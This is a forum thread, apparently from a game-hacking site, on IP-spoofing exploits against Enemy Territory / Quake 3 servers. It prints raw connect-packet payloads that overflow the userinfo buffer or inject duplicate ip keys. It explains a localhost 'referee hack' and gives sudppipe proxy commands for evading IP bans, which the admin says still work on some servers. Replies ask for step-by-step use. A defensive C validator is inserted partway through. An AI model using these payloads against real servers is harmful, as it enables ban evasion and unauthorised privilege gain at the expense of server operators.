    OOB IP Spoofing exploits: Referee hack & Unban

    • Annihil (admin)

      Enemy Territory uses the Quake3 network protocol.

      When you connect to a server, the communication is initialized by an OOB (Out of Band) message, whose format is:

      \xff\xff\xff\xffconnect "<userinfo>"

      The \xff\xff\xff\xff is the packet header; it is equal to 0xFF 0xFF 0xFF 0xFF and is used to identify the packet type.

      connect is the intended command.

      The userinfo is a key-value string whose format is \key\value.

      The userinfo contains

      • g_password: the server password
      • cl_guid: the etkey
      • cl_wwwDownload: whether the client allows pk3 download
      • name: the player name
      • rate: the packet transfer rate
      • snaps: the ping adjustment ?
      • cl_punkbuster: whether punkbuster is enabled
      • protocol: the protocol version, here 84
      • qport: the client port used
      • challenge: a random number ?

      The raw line looks like this:

      \xff\xff\xff\xffconnect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564"

      Now, when the server receives the connect query message, it appends another value at the end of your userinfo: your IP.

      \xff\xff\xff\xffconnect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\ip\216.3.128.12:60252"

      There are two ways to alter this value.

      Buffer Overflow

      The <userinfo> is a char array of size 1024

      #define MAX_INFO_STRING 1024
      

      so I thought of adding a long key-value pair of (1024 - current <userinfo> length) characters at the end of the sent userinfo.

      It looks like this:

      \xff\xff\xff\xffconnect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

      So, here, my <userinfo> is followed by \421 × A\420 × A.

      When the server receives that, it will add your IP after your userinfo, but as it's stored in a char[1024] variable, a buffer overflow occurs and your IP is discarded.

      The server does not know your current IP anymore, and if you were IP banned, now you're not.

      Duplicate field exploit

      If the server receives the same key twice in the userinfo string, it will remove the last duplicated key.

      Inserting

      \ip\216.3.128.12:60252\ip\216.3.128.12:60252
      

      after the name key (for example) will make the server remove the last ip key, which is your real IP, keeping the one you inserted in your fake userinfo.

      The raw line would look like this:

      \xff\xff\xff\xffconnect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\ip\localhost\ip\localhost\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\693\challenge\385942564"

      This method makes it possible to spoof the IP.

      Now, another exploit can be used with IP spoofing.

      Referee hack

      Instead of spoofing the IP to a random IP like 216.3.128.12, spoofing it to localhost will automatically promote the player to Referee status.

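      The post above describes three things a server can check for on its side before it trusts a connect packet: a userinfo that leaves no room for the appended \ip\ value, a client-supplied ip key, and a repeated key. The validator below is an added example written for this thread; it is not code from the post, from sudppipe, or from the Enemy Territory / Quake 3 engine. Only MAX_INFO_STRING comes from the post; the function names, reason codes and test strings are constructed for illustration.

```c
#include <string.h>
#define MAX_INFO_STRING 1024   /* engine limit quoted in the post */

/* Reason codes returned by validate_userinfo() (constructed for this example) */
enum { INFO_OK = 0, INFO_TOO_LONG, INFO_RESERVED_KEY, INFO_DUP_KEY, INFO_MALFORMED };

/* Server-side check of a client-supplied "\key\value" userinfo string, run
 * before the server appends its own \ip\ value; 'reserve' is the room that
 * append needs ("\ip\" + address + ":" + port). */
int validate_userinfo(const char *info, size_t reserve)
{
    const char *keys[128];
    size_t lens[128];
    int n = 0;
    /* 1. A client that fills the buffer makes the appended IP unstorable:
     *    refuse the connect instead of silently losing the address. */
    if (strlen(info) + reserve >= MAX_INFO_STRING)
        return INFO_TOO_LONG;
    for (const char *p = info; *p; ) {
        if (*p != '\\') return INFO_MALFORMED;      /* trailing garbage */
        const char *key = p + 1, *key_end = strchr(key, '\\');
        if (key_end == NULL) return INFO_MALFORMED; /* key without value */
        size_t klen = (size_t)(key_end - key);
        /* 2. "ip" is written by the server from the socket address;
         *    a client must never supply it, in any position. */
        if (klen == 2 && strncmp(key, "ip", 2) == 0) return INFO_RESERVED_KEY;
        /* 3. Reject any repeated key, so a first-match lookup cannot be
         *    steered and removing one copy cannot leave another behind. */
        for (int i = 0; i < n; i++)
            if (lens[i] == klen && strncmp(keys[i], key, klen) == 0)
                return INFO_DUP_KEY;
        if (n == 128) return INFO_MALFORMED;        /* absurd key count */
        keys[n] = key; lens[n] = klen; n++;
        const char *val_end = strchr(key_end + 1, '\\');
        p = val_end ? val_end : key_end + 1 + strlen(key_end + 1);
    }
    return INFO_OK;
}

/* Builds the padding case from the post (base + "\A..A\A..A"), reserving
 * room for the longest possible "\ip\" value, and validates it. */
int validate_padded(const char *base, size_t key_len, size_t val_len)
{
    char buf[2 * MAX_INFO_STRING];
    size_t b = strlen(base);
    if (b + key_len + val_len + 3 > sizeof buf) return INFO_TOO_LONG;
    memcpy(buf, base, b);
    buf[b] = '\\'; memset(buf + b + 1, 'A', key_len);
    buf[b + 1 + key_len] = '\\'; memset(buf + b + 2 + key_len, 'A', val_len);
    buf[b + 2 + key_len + val_len] = '\0';
    return validate_userinfo(buf, strlen("\\ip\\255.255.255.255:65535"));
}
```

      A server that rejects the connect on any non-zero code, and always writes the ip key itself from the socket address, never has to reconcile two copies of the key.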
      • DrWindows

        Does it still work?

        • Annihil (admin) @DrWindows

          @DrWindows On some servers yes

          • DrWindows

            I don't get how it works? Can u explain that ref hack?

            • Annihil (admin) @DrWindows

              You can use Simple UDP proxy/pipe 0.4.1 (sudppipe) with the Quake 3 engine "connect" modifier 0.2 (q3conmod_sudp) (compatible with Enemy Territory as it uses the Quake 3 network protocol):

              plugin for sudppipe which allows a simple customization of the "connect" packet for the games which use the Quake 3 engine:
              sudppipe -l q3conmod_sudp.dll -L "\parameter1\value1\parameter2\value2" IP PORT 1234
              (use -L "" for the runtime help) then from the console of the game type: /connect 127.0.0.1:1234
              the following is an example for joining a server which uses PunkBuster with PB disabled (the client will be kicked after some seconds/minutes):
              sudppipe -l q3conmod_sudp.dll -L "\cl_punkbuster\1" SERVER PORT 1234
              then from the client:
              /pb_cl_disable
              /connect 127.0.0.1:1234

              So to spoof your IP address, you can use
              sudppipe -l q3conmod_sudp.dll -L "\ip\216.3.128.12:60252\ip\216.3.128.12:60252" SERVER PORT 1234
              Then, ingame, /connect 127.0.0.1 1234

              • DrWindows @Annihil

                @Annihil I don't get anything xD where do I need to type that?

                • Annihil (admin) @DrWindows

                  @DrWindows In the Windows Command Prompt (cmd)

                  • DrWindows

                    It's really confusing.

                    Can you write a tutorial with like,
                    1st you do this,
                    2nd this etc?

                      • sekenbeken

                      Hello!
                      Do you know why it causes a cmd failure? I do everything according to your guide.
                      Bat File:
                      https://imgur.com/GMbzy40
                      (4 is port)
                      Connecting to server:
                      https://i.imgur.com/HGHHjTT.jpg
                      https://i.imgur.com/EZ94RS4.jpg
                      https://i.imgur.com/vJh1ebI.jpg
